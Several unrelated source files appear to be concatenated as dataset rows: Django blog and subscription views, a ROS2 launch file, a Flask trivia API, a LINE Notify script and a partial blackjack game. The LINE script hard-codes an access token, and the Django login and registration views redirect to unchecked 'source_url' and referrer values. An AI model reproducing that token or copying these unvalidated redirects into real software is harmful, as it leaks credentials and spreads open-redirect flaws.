    # of a mangled comment) and raised a NameError at runtime.
    comment_count_list = Comment.objects.values('article').annotate(comment_count=Count('article')).order_by('-comment_count')
    article_comment_list = [Article.objects.get(pk=comment['article']) for comment in comment_count_list]
    return locals()
def index(request):
    """Home page: latest articles, paginated (2 per page via getPage)."""
    try:
        # Latest articles.
        article_list = Article.objects.all()
        article_list = getPage(request, article_list)
        # Archive notes kept from earlier experiments:
        # 1) we need the distinct year-month values (e.g. 2015/06) of the
        #    published articles.
        # values() + distinct() does not drop the duplicates:
        # print Article.objects.values('date_publish').distinct()
        # Raw SQL attempt #1 (does not work):
        # archive_list =Article.objects.raw('SELECT id, DATE_FORMAT(date_publish, "%%Y-%%m") as col_date FROM blog_article ORDER BY date_publish')
        # for archive in archive_list:
        # print archive
        # Raw SQL attempt #2 (works but not recommended):
        # cursor = connection.cursor()
        # cursor.execute("SELECT DISTINCT DATE_FORMAT(date_publish, '%Y-%m') as col_date FROM blog_article ORDER BY date_publish")
        # row = cursor.fetchall()
        # print row
    except Exception as e:
        print e
        logger.error(e)
    return render(request, 'index.html', locals())
# Archive view: articles published in one year-month.
def archive(request):
    """Render the archive page for the year/month query parameters."""
    try:
        # Year and month arrive as query-string parameters.
        year = request.GET.get('year', None)
        month = request.GET.get('month', None)
        article_list = getPage(
            request,
            Article.objects.filter(date_publish__icontains=year + '-' + month))
    except Exception as e:
        logger.error(e)
    return render(request, 'archive.html', locals())
# Article list filtered by tag
def tag(request):
    """Placeholder view: tag filtering is not implemented yet."""
    try:
        pass
    except Exception as e:
        logger.error(e)
    return render(request, 'archive.html', locals())
# Pagination helper
def getPage(request, article_list):
    """Paginate *article_list* (2 items per page); fall back to page 1
    when the requested page is empty or invalid."""
    paginator = Paginator(article_list, 2)
    try:
        page_number = int(request.GET.get('page', 1))
        return paginator.page(page_number)
    except (EmptyPage, InvalidPage, PageNotAnInteger):
        return paginator.page(1)
# Article detail page
def article(request):
    """Render one article plus its two-level comment tree."""
    try:
        # Article id from the query string.
        id = request.GET.get('id', None)
        try:
            article = Article.objects.get(pk=id)
        except Article.DoesNotExist:
            return render(request, 'failure.html', {'reason': '没有找到对应的文章'})
        # Comment form, pre-filled for authenticated users.
        comment_form = CommentForm({'author': request.user.username,
                                    'email': request.user.email,
                                    'url': request.user.url,
                                    'article': id} if request.user.is_authenticated() else{'article': id})
        # Build the comment tree: top-level comments collect their replies
        # in a dynamically attached children_comment list.
        comments = Comment.objects.filter(article=article).order_by('id')
        comment_list = []
        for comment in comments:
            for item in comment_list:
                if not hasattr(item, 'children_comment'):
                    setattr(item, 'children_comment', [])
                if comment.pid == item:
                    item.children_comment.append(comment)
                    break
            if comment.pid is None:
                comment_list.append(comment)
    except Exception as e:
        print e
        logger.error(e)
    return render(request, 'article.html', locals())
# Submit a comment
def comment_post(request):
    """Validate and persist a comment, then redirect back to the referrer."""
    try:
        comment_form = CommentForm(request.POST)
        if comment_form.is_valid():
            # Create the comment from the validated form data.
            comment = Comment.objects.create(username=comment_form.cleaned_data["author"],
                                             email=comment_form.cleaned_data["email"],
                                             url=comment_form.cleaned_data["url"],
                                             content=comment_form.cleaned_data["comment"],
                                             article_id=comment_form.cleaned_data["article"],
                                             user=request.user if request.user.is_authenticated() else None)
            comment.save()
        else:
            return render(request, 'failure.html', {'reason': comment_form.errors})
    except Exception as e:
        logger.error(e)
    return redirect(request.META['HTTP_REFERER'])
# Log out
def do_logout(request):
    """Log the current user out and return to the referring page."""
    try:
        logout(request)
    except Exception as e:
        print e
        logger.error(e)
    return redirect(request.META['HTTP_REFERER'])
# Registration
def do_reg(request):
    """Handle registration: create the account, log it in, then redirect."""
    try:
        if request.method == 'POST':
            reg_form = RegForm(request.POST)
            if reg_form.is_valid():
                # Create the account (password stored hashed).
                user = User.objects.create(username=reg_form.cleaned_data["username"],
                                           email=reg_form.cleaned_data["email"],
                                           url=reg_form.cleaned_data["url"],
                                           password=make_password(reg_form.cleaned_data["password"]),)
                user.save()
                # Log the new user in straight away.
                user.backend = 'django.contrib.auth.backends.ModelBackend'  # use the default auth backend
                login(request, user)
                return redirect(request.POST.get('source_url'))
            else:
                return render(request, 'failure.html', {'reason': reg_form.errors})
        else:
            reg_form = RegForm()
    except Exception as e:
        logger.error(e)
    return render(request, 'reg.html', locals())
# Login
def do_login(request):
    """Handle the login form; on success redirect to source_url."""
    try:
        if request.method == 'POST':
            login_form = LoginForm(request.POST)
            if login_form.is_valid():
                # Authenticate against the default backend.
                username = login_form.cleaned_data["username"]
                password = login_form.cleaned_data["password"]
                user = authenticate(username=username, password=password)
                if user is not None:
                    user.backend = 'django.contrib.auth.backends.ModelBackend'  # use the default auth backend
                    login(request, user)
                else:
                    return render(request, 'failure.html', {'reason': '登录验证失败'})
                return redirect(request.POST.get('source_url'))
            else:
                return render(request, 'failure.html', {'reason': login_form.errors})
        else:
            login_form = LoginForm()
    except Exception as e:
        logger.error(e)
    return render(request, 'login.html', locals())
def category(request):
    """Paginated article list for one category (cid from the query string)."""
    try:
        # Category id supplied by the client.
        cid = request.GET.get('cid', None)
        try:
            category = Category.objects.get(pk=cid)
        except Category.DoesNotExist:
            return render(request, 'failure.html', {'reason': '分类不存在'})
        article_list = Article.objects.filter(category=category)
        article_list = getPage(request, article_list)
    except Exception as e:
        logger.error(e)
    return render(request, 'category.html', locals())
|
4,874 | ae4f8eb71939ff212d05d12f65edeaecf66f2205 | from launch import LaunchDescription
from launch_ros.actions import Node
import os
# Absolute path to the node's parameter file.
# NOTE(review): 'INSERT_PATH' is a placeholder and must be replaced with
# the real workspace path before launching.
params = os.path.join(
    'INSERT_PATH/src/beckhoff_ros',
    'config',
    'params.yaml'
)
def generate_launch_description():
    """Launch the beckhoff_ros node with the parameters loaded above."""
    beckhoff_node = Node(
        package='beckhoff_ros',
        executable='beckhoff_ros_node',
        name='beckhoff_ros_node',
        parameters=[params],
        output='screen',
    )
    return LaunchDescription([beckhoff_node])
4,875 | f1972baee8b399c9a52561c8f015f71cb9922bb0 | version https://git-lfs.github.com/spec/v1
oid sha256:7f0b7267333e6a4a73d3df0ee7f384f7b3cb6ffb14ed2dc8a5894b853bac8957
size 1323
|
4,876 | b84a2093a51e57c448ee7b4f5a89d69dfb14b1b6 | import os
import sys
from flask import Flask, request, abort, flash, jsonify, Response
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_migrate import Migrate
import random
import unittest
from models import db, Question, Category
# number of questions per page for pagination
QUESTIONS_PER_PAGE = 10
# create and configure the app
app = Flask(__name__)
app.config.from_object('config')
db.init_app(app)
migrate = Migrate(app, db)
# set up CORS; allow any origin.
# NOTE(review): the resource pattern r'/' only matches the root path —
# r'/*' was likely intended; confirm.
cors = CORS(app, resources={r'/': {'origins': '*'}})
# Attach the Access-Control-Allow headers to every outgoing response.
@app.after_request
def after_request(response):
    """Add CORS allow-headers/allow-methods headers to *response*."""
    response.headers.add('Access-Control-Allow-Headers',
                         'Content-Type, Authorization, true')
    response.headers.add('Access-Control-Allow-Methods',
                         'GET, PATCH,PUT,POST, DELETE, OPTIONS')
    return response
# endpoint to handle GET requests for all available categories
@app.route('/categories', methods=['GET'])
def get_categories():
    """Return the names of every category."""
    names = [c.type for c in Category.query.all()]
    return jsonify({'categories': names, 'success': True})
# endpoint to handle GET requests for questions with pagination
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
    """Return page *page* of questions (10 per page) plus all categories.

    NOTE(review): abort(404) raises inside the try block and is swallowed
    by the broad `except Exception`, so the client always sees 400 on
    failure; and `<int:page>` already guarantees an int, making the 422
    check unreachable. Confirm the intended status codes.
    """
    error = False
    questions = []
    total_questions = 0
    # if question id is not an integer
    if type(page) is not int:
        # let them know their input is not processable
        abort(422)
    # ensure proper request method
    if request.method == 'GET':
        try:
            # query for all categories
            categories = [category.type for category in Category.query.all()]
            if categories is None:
                # let the user know that no resource was found
                abort(404)
            query = Question.query.paginate(page, per_page=10)
            total_questions += len(Question.query.all())
            if query is None:
                # let the user know that no resource was found
                abort(404)
            if len(query.items) == 0:
                # let the user know that no resource was found
                error = True
            results = query.items
            # format data
            for question in results:
                _question_ = {
                    'id': question.id,
                    'question': question.question,
                    'answer': question.answer,
                    'category': question.category,
                    'difficulty': question.difficulty
                }
                questions.append(_question_)
        except Exception:
            # set error to true and log on the server
            error = True
            print('Error: {}'.format(sys.exc_info()))
        finally:
            if error:
                # let the user know their request was not successful
                abort(400)
            else:
                # if successful send back success response
                return jsonify({
                    'success': True,
                    'questions': questions,
                    'total_questions': total_questions,
                    'categories': categories
                })
    else:
        # send method not allowed error
        abort(405)
# endpoint to delete a question from the database
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
    """Delete the question with id *question_id*.

    NOTE(review): a missing id makes Question.query.get() return None and
    db.session.delete(None) raise, so the client receives 400 rather than
    a 404 — confirm the intended behavior.
    """
    error = False
    # ensure proper request method
    if request.method == 'DELETE':
        # if question id is not an integer
        if type(question_id) is not int:
            # let them know their input is not processable
            abort(422)
        try:
            # get user selected question from database
            question = Question.query.get(question_id)
            # stage question delete
            db.session.delete(question)
            # commit deletion to the database
            db.session.commit()
        except Exception:
            # set error to true and log on the server
            error = True
            print('Error: {}'.format(sys.exc_info()))
        finally:
            # close database session
            db.session.close()
            if error:
                # send bad request error
                abort(400)
            else:
                # if no error send success object and log on server
                return jsonify({
                    'success': True,
                    'method': 'Delete',
                    'question': question_id
                })
    else:
        # send method not allowed error
        abort(405)
# endpoint to add a question to the database
@app.route('/questions', methods=['POST'])
def add_question():
    """Create a question from the JSON body
    (keys: question, answer, category, difficulty)."""
    error = False
    # ensure proper request method
    if request.method == 'POST':
        try:
            # format data for database
            new_question = Question(
                question=request.json['question'],
                answer=request.json['answer'],
                category=request.json['category'],
                difficulty=request.json['difficulty']
            )
            # stage data in database
            db.session.add(new_question)
            # commit data to database
            db.session.commit()
        except Exception:
            # set error to true, roll back, and log on the server
            error = True
            db.session.rollback()
            print('Error: {}'.format(sys.exc_info()))
        finally:
            # close database session
            db.session.close()
            if error:
                # send bad request error
                abort(400)
            else:
                # if no error send success object and log on server
                print('Added: {}'.format(new_question))
                return jsonify({
                    'success': True,
                    'question': request.json
                })
    else:
        # send method not allowed error
        abort(405)
# endpoint to search for questions in the database
@app.route('/questions/search', methods=['POST'])
def search_questions():
    """Case-insensitive substring search over question text."""
    error = False
    # ensure proper request method
    if request.method == 'POST':
        # set search term from user request
        search_term = str(request.json['searchTerm'])
        # NOTE(review): the str() cast above makes this check unreachable.
        if type(search_term) is not str:
            # let them know their input is not processable
            abort(422)
        try:
            # query database using user provided search term
            query_results = Question.query.filter(
                Question.question.ilike('%{}%'.format(search_term))).all()
            questions = []
            # get categories from database
            categories = [category.type for category in Category.query.all()]
            # format response data
            for question in query_results:
                _question_ = {
                    'id': question.id,
                    'question': question.question,
                    'answer': question.answer,
                    'category': question.category,
                    'difficulty': question.difficulty
                }
                questions.append(_question_)
        except Exception:
            # set error to true and log on the server
            error = True
            print('Error: {}'.format(sys.exc_info()))
        finally:
            if error:
                # send bad request error
                abort(400)
            else:
                # if no error send success object
                return jsonify({
                    'success': True,
                    'questions': questions,
                    'total_questions': len(questions),
                    'current_category': ''
                })
    else:
        # send method not allowed error
        abort(405)
# endpoint to get questions by a specific category
@app.route('/category/<int:category_id>/questions', methods=['GET'])
def get_questions_by_category(category_id):
    """Return every question whose category matches *category_id*."""
    error = False
    # ensure proper request method
    if request.method == 'GET':
        # NOTE(review): the <int:category_id> converter already guarantees
        # an int, so this check is unreachable.
        if type(category_id) is not int:
            # let them know their input is not processable
            abort(422)
        try:
            # get questions by user selected category
            query = Question.query.filter_by(category=str(category_id)).all()
            questions = []
            # format response data
            for question in query:
                _question_ = {
                    'id': question.id,
                    'question': question.question,
                    'answer': question.answer,
                    'category': question.category,
                    'difficulty': question.difficulty
                }
                questions.append(_question_)
        except Exception:
            # set error to true and log on the server
            error = True
            print('Error: {}'.format(sys.exc_info()))
        finally:
            if error:
                # send bad request error
                abort(400)
            else:
                # if no error send success object
                return jsonify({
                    'success': True,
                    'questions': questions,
                    'total_questions': len(questions),
                    'current_category': ''
                })
    else:
        # send method not allowed error
        abort(405)
# endpoint to initiate quiz
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
    """Return one random question not in previous_questions for the category.

    NOTE(review): if every question in the pool has already been played,
    the while-loop below never terminates; an empty pool makes
    randint(0, -1) raise; and the `id + 1` offset assumes the frontend
    sends 0-based category ids — confirm against the client.
    """
    error = False
    # ensure proper request method
    if request.method == 'POST':
        try:
            data = request.json
            # get questions from any category
            if data['quiz_category']['id'] == 0:
                query = Question.query.all()
            # get questions from user specified category
            else:
                query = Question.query.filter_by(
                    category=str(int(data['quiz_category']['id'])+1)).all()
            # randomly select new non previously selected question
            previous_questions = data['previous_questions']
            index = random.randint(0, len(query)-1)
            potential_question = query[index]
            selected = False
            while selected is False:
                if potential_question.id in previous_questions:
                    # reassign index if already used
                    index = random.randint(0, len(query)-1)
                    potential_question = query[index]
                else:
                    selected = True
            # set question
            _question_ = potential_question
            # format data
            next_question = {
                'id': _question_.id,
                'question': _question_.question,
                'answer': _question_.answer,
                'category': _question_.category,
                'difficulty': _question_.difficulty
            }
        except Exception:
            # set error and log error on the server
            error = True
            print('Error: {}'.format(sys.exc_info()))
        finally:
            if error:
                # send internal server error
                abort(500)
            else:
                # if no error send success object
                return jsonify({
                    'success': True,
                    'question': next_question
                })
    else:
        # send method not allowed error
        abort(405)
# handle bad request errors
@app.errorhandler(400)
def bad_request(error):
    """400 response in the API's JSON envelope."""
    body = {"success": False, "error": 400, "message": "Bad Request"}
    return jsonify(body), 400
# handle resource not found errors
@app.errorhandler(404)
def resource_not_found(error):
    """404 response in the API's JSON envelope."""
    body = {"success": False, "error": 404, "message": "Resource Not Found"}
    return jsonify(body), 404
# handle method not allowed errors
@app.errorhandler(405)
def method_not_allowed(error):
    """405 response in the API's JSON envelope."""
    body = {"success": False, "error": 405, "message": "Method Not Allowed"}
    return jsonify(body), 405
# handle unprocessable entity errors
@app.errorhandler(422)
def unprocessable_entity(error):
    """422 response in the API's JSON envelope."""
    body = {"success": False, "error": 422, "message": "Unprocessable Entity"}
    return jsonify(body), 422
# handle internal server errors
@app.errorhandler(500)
def internal_server_error(error):
    """500 response in the API's JSON envelope."""
    body = {"success": False, "error": 500, "message": "Internal Server Error"}
    return jsonify(body), 500
# Run the development server on the default port when executed directly.
if __name__ == '__main__':
    app.run()
|
4,877 | d583661accce8c058f3e6b8568a09b4be1e58e4e |
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseServerError
from django.shortcuts import render
from django.template import RequestContext
import json
import datetime
import os
import re
from cog.views.utils import getQueryDict
from cog.plugins.esgf.security import esgfDatabaseManager
import traceback
import json
# Code used for react components
# Get directories for static files
package_dir = os.path.dirname(os.path.abspath(__file__))
static_dir = os.path.dirname(package_dir)
js_dir = os.path.join(static_dir,"static/cog/cog-react/js/")
css_dir = os.path.join(static_dir,"static/cog/cog-react/css/")
# Get static list
js_files = os.listdir(js_dir)
css_files = os.listdir(css_dir)
js_files = list(map(lambda f: "cog/cog-react/js/" + f, js_files))
css_files = list(map(lambda f: "cog/cog-react/css/" + f, css_files))
# Separate source and map files
map_files = []
js_only = []
for f in js_files:
if f.endswith(".map"):
map_files.append(f)
else:
js_only.append(f)
css_only = []
for f in css_files:
if f.endswith(".map"):
map_files.append(f)
else:
css_only.append(f)
# These files are used by Django 'subscribe.html' page, to renders front-end.
react_files = {
'css': css_only,
'js': js_only,
'map': map_files
}
# Example data that subscriptions front-end could receive from back-end
test_data = {
"post_url": "/subscription/",
"user_info": {"first":"John","last":"Doe","hobbies":"Programming.","send_emails_to":"This place."},
"activities": {"method":["email"],"weekly":["CMIP"],"monthly":["CMIP6"]},
"experiments": {"method":["popup"],"daily":["test", "experiment 2"],"weekly":["test2"]},
}
# To pass data to front-end, use react-props and pass it a dictionary with key-value pairs
react_props = test_data
def lookup_and_render(request):
    """List the current user's subscriptions, or render an error page."""
    try:
        subscriptions = esgfDatabaseManager.lookupUserSubscriptions(request.user)
    except Exception as e:
        # Log the traceback, then show the error page.
        print(traceback.print_exc())
        return render(
            request, 'cog/subscription/subscribe_done.html',
            {'email': request.user.email,
             'error': "An Error Has Occurred While Processing Your Request. <p> {}".format(str(e))})
    return render(request, 'cog/subscription/subscribe_list.html', {'dbres': subscriptions})
def delete_subscription(request):
    """Delete one subscription (POSTed 'subscription_id') or, when the id is
    the literal string "ALL", every subscription of the requesting user."""
    res = request.POST.get('subscription_id', None)
    try:
        if res == "ALL":
            dbres = esgfDatabaseManager.deleteAllUserSubscriptions(
                request.user)
        else:
            # NOTE(review): a missing id arrives here as None — presumably
            # the DB layer rejects it; confirm.
            dbres = esgfDatabaseManager.deleteUserSubscriptionById(res)
    except Exception as e:
        # log error
        error_cond = str(e)
        return render(request, 'cog/subscription/subscribe_done.html', {'error': "An Error Has Occurred While Processing Your Request. <p> {}".format(error_cond)})
    return render(request, 'cog/subscription/subs_delete_done.html')
def temp_print(request, var_name, method="POST"):
    """Debug helper: print the value of *var_name* from the request payload.

    For POST requests the JSON body is parsed; otherwise a copy of the GET
    query dict is used.  Prints the value, a key-error notice, or "None" when
    the payload is empty.  Returns nothing.

    NOTE(review): *method* is only a label in the printed output — the actual
    branch is selected from ``request.method``; confirm callers expect this.
    """
    print(request.POST)  # raw POST dict, kept for debugging parity
    if request.method == "POST":
        data = json.loads(request.body)
    else:
        data = request.GET.copy()
    if data:  # idiomatic truthiness check (was the non-Pythonic `if(data)`)
        try:
            print("{} {}: {}".format(method, var_name, data[var_name]))
        except KeyError:
            print("Key error: {}".format(data))
    else:
        print("{} {}: None".format(method, var_name))
@login_required
def subscribe(request):
    """Subscription endpoint.

    * POST: parse the JSON body and echo it back as JSON (React contract).
    * GET with action=modify: list the user's current subscriptions.
    * other GET: render the React subscription page.

    NOTE(review): the POST branch always returns, so the trailing
    `elif`/`else` branches only execute for methods other than GET/POST —
    confirm whether that legacy form-based flow is still reachable.
    """
    # Contains the data from the front-end POST requests
    if request.method == "POST":
        # Get data from the POST request received from front-end
        data = json.loads(request.body)
        # Example obtaining data
        if data:
            for key in data.keys():
                print("{}: {}".format(key, data[key]))
        # Example response sent back to front-end
        test = {"status": "All good!","data": data}
        return HttpResponse(json.dumps(test),content_type='application/json')
    if request.method == 'GET':
        if request.GET.get('action') == "modify":
            return lookup_and_render(request)
        else:
            return render(request, 'cog/subscription/subscribe.html', {'react_files': react_files, 'react_props': react_props})
    elif request.POST.get('action') == "delete":
        return delete_subscription(request)
    else:
        # Legacy form path: collect up to three subscription key/value pairs.
        period = request.POST.get("period", -1)
        if period == -1:
            return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'error': "Invalid period"})
        subs_count = 0
        error_cond = ""
        keyarr = []
        valarr = []
        for i in range(1, 4):
            keystr = 'subscription_key{}'.format(i)
            keyres = request.POST.get(keystr, '')
            valstr = 'subscription_value{}'.format(i)
            valres = request.POST.get(valstr, '')
            # Skip blank or single-character entries.
            if len(keyres) < 2 or len(valres) < 2:
                continue
            keyarr.append(keyres)
            valarr.append(valres)
            subs_count = subs_count + 1
        if subs_count > 0:
            try:
                esgfDatabaseManager.addUserSubscription(
                    request.user, period, keyarr, valarr)
            except Exception as e:
                # log error
                error_cond = str(e)
                return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'error': "An Error Has Occurred While Processing Your Request. <p> {}".format(error_cond), })
            return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'count': subs_count})
        else:
            return render(request, 'cog/subscription/subscribe.html', {'react_files': react_files, 'react_props': react_props})
|
4,878 | 8b598703df67fb8287fe6cdccda5b73bf2892da8 | # -*- coding: utf-8 -*-
import requests
import os
def line(body):
    """Send *body* as a LINE Notify message.

    Returns the ``requests.Response`` so callers can check the status code
    (the previous version discarded it).

    SECURITY NOTE: the access token is hard-coded in source; it should be
    read from an environment variable and the committed token revoked.
    """
    url = "https://notify-api.line.me/api/notify"
    access_token = 'I89UnoDRgRSInUXJOTg5fAniBE08CUuxVqj8ythMLt8'
    headers = {'Authorization': 'Bearer ' + access_token}
    payload = {'message': body}
    # timeout prevents the caller from hanging forever on network trouble
    r = requests.post(url, headers=headers, params=payload, timeout=10)
    return r
def send_image():
    """Post a fixed error message plus 'screen.png' (stored beside this
    module) to LINE Notify.

    Returns the ``requests.Response``.  The image file is now opened in a
    ``with`` block so the handle is closed even if the request raises (the
    previous version leaked the file object).
    """
    url = "https://notify-api.line.me/api/notify"
    access_token = 'I89UnoDRgRSInUXJOTg5fAniBE08CUuxVqj8ythMLt8'
    # File Name
    FILENAME = os.path.join(os.path.dirname(os.path.abspath(__file__)), "screen.png")
    headers = {'Authorization': 'Bearer ' + access_token}
    message = 'この画面のエラーで落ちました'
    payload = {'message': message}
    with open(FILENAME, 'rb') as image_file:
        files = {'imageFile': image_file}
        r = requests.post(url, headers=headers, params=payload, files=files, timeout=10)
    return r
4,879 | a7050ebd545c4169b481672aed140af610aea997 | from card import Card;
from deck import Deck;
import people;
import chip;
import sys;
import time;
def display_instructions() :
    """Print the blackjack rules and the hit/stand/split/double-down
    explanations, then wait for the user to press a key."""
    print('\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 ');
    print('as possible without going over. The numbered cards have the value of their number, face cards have ');
    print('a value of 10 each, and the ace can either be counted as 1 or 11 (player\'s choice)\n');
    print('Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to ');
    print('each player (up to 7 players) and to the dealer. The player\'s cards will be face up while one of the ');
    print('dealer\'s cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n');
    print('     Hit: when a player \'hits,\' he or she is dealt another card. A player can hit as many ');
    print('     times as wanted, up until the player busts (goes over 21). \n');
    print('     Stand: To \'stand\' means to stay with the current cards. \n');
    print('     Split: A player can \'split\' only when the first two cards of his or her hand are the ');
    print('     same. When this occurs, the player makes two separate piles, one with each ');
    print('     identical card, and places a bet identical to the initial bet for the second ');
    print('     pile. Then, the player can hit or stand with each pile as in a normal round.\n');
    print('     Double Down: When a player chooses to \'double down\', he or she can increase the current bet ');
    print('     by 100% in exchange for agreeing to stand after being dealt one more card.\n');
    input('Ready to play? Hit any key to continue: ');
    print();
def get_num_players() :
    """Prompt until a whole number of players between 1 and 7 is entered;
    return it as an int."""
    num = input('How many people will be playing (up to 7)? Enter a number: ');
    while not num.isdigit() or not 1 <= int(num) <= 7 :
        num = input('Please enter a number from 1 to 7: ');
    print('\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n');
    time.sleep(1);
    return int(num);
def create_players(num) :
    """Ask each of *num* players for a non-empty name and return a list of
    people.Player objects, each starting with $1,000."""
    players_list = [];
    for i in range(num) :
        name = input(f'Player {i+1}, what is your name? ');
        while name == '':
            name = input('Please enter your name: ');
        players_list.append(people.Player(name, 1000));
    print('\nAll players will begin the game with the same amount of $1,000 dollars.\n');
    return players_list;
def deal(dealer, players) :
    """Deal one card to every solvent non-dealer player, then one card to
    the dealer (the last entry in *players*)."""
    for recipient in players[:-1] :
        if not recipient.check_broke() :
            dealer.deal_card(recipient);
    # The dealer receives a card as well.
    dealer.deal_card(players[-1]);
def place_bets(players) :
    """Ask every solvent player (dealer excluded) for a whole-number bet no
    larger than their bankroll, storing it on player.bet.

    NOTE(review): the local `bets` list is never populated or returned —
    it appears to be dead code.
    """
    print('Now, each of you must place your bets.\n');
    bets = [];
    for player in players[:-1] : # doesn't reach dealer
        if not player.check_broke() :
            bet = input(f'Bet for {player.name}: ');
            while not bet.isdigit() or int(bet) > player.money :
                msg = 'Please enter a whole number: ';
                if bet.isdigit() :
                    msg = 'You don\'t have enough money! Enter a different value: ';
                bet = input(msg);
            player.bet = int(bet);
    print();
def view_hands(players) :
    """Show every player's hand (dealer shows one card face down) and
    announce any immediate blackjacks."""
    print('Here are the hands for each player: \n');
    for p in players :
        if isinstance(p, people.Dealer) :
            # Dealer's second card stays hidden until the dealer's turn.
            print(f'{p.name}: [{p.hand[0][0]}, ?]', end='');
            print();
        else :
            if not p.check_broke() :
                print(f'{p.name}: {p.hand}', end='');
                if p.check_blackjack() :
                    print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!');
                else : print();
    print();
def do_decision(player, dealer, hand_index=0) :
    """Prompt *player* for an action and dispatch to the matching handler.

    Re-prompts until the chosen handler reports success (returns True),
    e.g. an invalid split attempt loops back here.
    """
    choices_dict = {'s':stand, 'h':hit, 'p':split, 'd':double_down};
    valid_choice = False;
    while not valid_choice :
        # Normalize once so 'S' dispatches like 's'.  Previously the raw
        # input was only lower-cased inside the validity test, so an
        # upper-case entry passed validation but choices_dict.get(choice)
        # returned None and the call crashed with a TypeError.
        choice = input(f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): ').lower();
        while choice not in choices_dict.keys() :
            choice = input('Please enter either \'s\', \'h\', \'p\', or \'d\', corresponding to your choice: ').lower();
        valid_choice = choices_dict.get(choice)(player, dealer, hand_index);
def cycle_decisions(players) :
    """Run one round of turns: each player chooses actions; the dealer then
    plays (hitting to 'hard' 17) and end-of-round payouts are printed.

    Payout rules implemented below: if the dealer busts, every surviving
    hand wins its bet; otherwise each hand is compared to the dealer's
    total (win / lose / tie).  Chip counts and bankrupt players are
    updated along the way.
    """
    dealer = players[-1];
    for p in players :
        if isinstance(p, people.Dealer) :
            print(f'{p.name} will hit until reaching a hand of at least \'hard\' 17 (without an ace counting for 11).');
            sys.stdout.flush();
            time.sleep(0.8);
            # Dealer draws only if not already done (blackjack/bust) and
            # below hard 17.
            if not check_status(p) and not p.check_hard_17() : hit(p, dealer);
            sys.stdout.flush();
            time.sleep(0.5);
            disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05);
            if p.check_bust() :
                # Dealer busted: every non-busted hand of every solvent
                # player wins its bet.
                for i in players[:-1] :
                    if not i.check_broke() :
                        sys.stdout.flush();
                        time.sleep(0.5);
                        print('    ', end='');
                        for j in range(0,len(i.hand)) : # this is to loop through each hand for a player (player would have multiple hands after splitting)
                            if not i.check_bust(j) :
                                print(f'{i.name} wins ${i.bet}! ', end='');
                                i.money += i.bet;
                            else :
                                print(f'{i.name} loses ${i.bet}! ', end='');
                                i.money -= i.bet;
                        i.chips = chip.convert_to_chips(i.money);
                        if i.check_broke() :
                            print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
                        else :
                            print(f'Current Balance: ${i.money} (Chips: {i.chips})');
            else :
                # Dealer stands: compare each surviving hand to the dealer.
                for i in players[:-1] :
                    if not i.check_broke() :
                        sys.stdout.flush();
                        time.sleep(0.5);
                        print('    ', end='');
                        for j in range(0,len(i.hand)) :
                            if not i.check_bust(j) :
                                if i.hand_value(j) > p.hand_value() :
                                    print(f'{i.name} wins ${i.bet}! ', end='');
                                    i.money += i.bet;
                                elif i.hand_value(j) < p.hand_value() :
                                    print(f'{i.name} loses ${i.bet}! ', end='');
                                    i.money -= i.bet;
                                else :
                                    print(f'{i.name} tied with the {p.name}! No change. ', end='');
                            else :
                                print(f'{i.name} loses ${i.bet}! ', end='');
                                i.money -= i.bet;
                        i.chips = chip.convert_to_chips(i.money);
                        if i.check_broke() :
                            print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
                        else :
                            print(f'Current Balance: ${i.money} (Chips: {i.chips})');
            sys.stdout.flush();
            time.sleep(0.5);
        else :
            # Human player's turn: skipped on blackjack or bankruptcy.
            if not p.check_blackjack() and not p.check_broke() :
                do_decision(p, dealer);
def stand(player, dealer, hand_index=0) :
    """Announce that *player* stays with the current hand; always succeeds."""
    print('{} stands.\n'.format(player.name));
    return True;
def hit(player, dealer, hand_index=0) :
    """Deal cards to *player* for hand *hand_index*: the dealer auto-hits
    to hard 17, a human is asked after each card whether to hit again.
    Always returns True (the action itself always succeeds).

    NOTE(review): the re-prompt 'Enter either ...' result is not
    lower-cased, so a capital 'Y' there exits the hit loop — confirm
    whether that is intended.
    """
    dealer.deal_card(player, hand_index);
    done = check_status(player, hand_index);
    if isinstance(player, people.Dealer) :
        while not player.check_hard_17() and not done:
            time.sleep(0.5);
            dealer.deal_card(player, hand_index);
            done = check_status(player, hand_index);
    else :
        choice = '';
        if not done :
            choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
            while choice != 'y' and choice != 'n' :
                choice = input('Enter either \'y\' or \'n\': ');
        while choice == 'y' and not done:
            dealer.deal_card(player, hand_index);
            done = check_status(player, hand_index);
            if not done :
                choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
                while choice != 'y' and choice != 'n' :
                    choice = input('Enter either \'y\' or \'n\': ');
    if not done : print();
    return True;
def split(player, dealer, hand_index=0) :
    """Split a pair into two hands and play each separately.

    Returns False (so do_decision re-prompts) when the hand is not a pair
    or the doubled bet exceeds the player's bankroll; True otherwise.
    """
    if player.hand[hand_index][0] != player.hand[hand_index][1] :
        print('You can\'t split on that hand! You need two identical cards to split. Choose again.');
        return False;
    elif player.bet*2 > player.money :
        print(f'You don\'t have enough money to split with your current bet (${player.bet} * 2 = ${player.bet*2})! Choose again.');
        return False;
    # Replace the single hand with two one-card hands.
    hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]];
    player.hand = hands;
    print('Now you will play each hand separately: \n');
    for i in range(0,2) :
        print(f'For Hand #{i+1}: ');
        do_decision(player, dealer, i);
    return True;
def double_down(player, dealer, hand_index=0) :
    """Double the player's bet (allowed once per round) and continue the
    turn.

    Returns False (so do_decision re-prompts) when the player cannot
